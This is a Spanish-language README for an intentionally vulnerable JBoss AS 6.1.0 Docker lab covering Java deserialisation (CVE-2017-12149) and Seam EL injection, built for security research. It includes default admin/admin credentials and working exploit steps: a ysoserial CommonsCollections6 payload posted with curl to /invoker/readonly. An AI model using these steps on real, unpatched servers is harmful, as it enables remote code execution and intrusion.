
Laboratorio de investigación con JBoss AS 6.1.0 en contenedor para demostrar vulnerabilidades de deserialización de Java (CVE-2017-12149) e inyección de EL en JBoss Seam, con pasos de verificación de exploits preconfigurados.
Muchas industrias críticas (banca, atención médica y manufactura) dependen de middleware heredado que fue construido para ejecutarse específicamente en JBoss 5 o 6. Debido a que estas aplicaciones suelen ser demasiado frágiles para migrar a versiones modernas de WildFly (el sucesor de JBoss), las organizaciones optan por "aislarlas" u ocultarlas detrás de VPNs en lugar de aplicar parches. Cuando esas defensas perimetrales fallan, la vulnerabilidad sigue ahí, activa y sin parchear.
Este repositorio proporciona un entorno contenedorizado de JBoss Application Server 6.1.0 específicamente configurado para la investigación de seguridad y la verificación de vulnerabilidades. Está diseñado para demostrar fallos de deserialización de Java e inyección EL de JBoss Seam.
Para asegurar que las credenciales y configuraciones personalizadas se apliquen correctamente, construya el contenedor desde cero:
docker-compose build --no-cache
docker-compose up -d
Consola JBoss: http://localhost:8080/admin-console/
Usuario: admin
Contraseña: admin
Vulnerabilidades Verificadas
La ruta de explotación más fiable en este entorno es a través del HTTPServerILServlet ubicado en /invoker/readonly.
Pasos de verificación:
Genere un payload usando ysoserial para crear un archivo en /tmp:
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser
Envíe el payload binario mediante curl:
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly
Confirme que el exploit funcionó:
docker exec -it jboss-custom-lab ls /tmp/pwned
Aviso de Seguridad Este entorno es intencionalmente vulnerable. Contiene software sin parchear y al final de su vida útil.
NO despliegue esto en un servidor expuesto públicamente.
NO utilice estas herramientas en sistemas en los que no tenga permiso explícito para realizar pruebas.
Desarrollado con fines educativos y de investigación en seguridad.
Dependencias: https://github.com/frohoff/ysoserial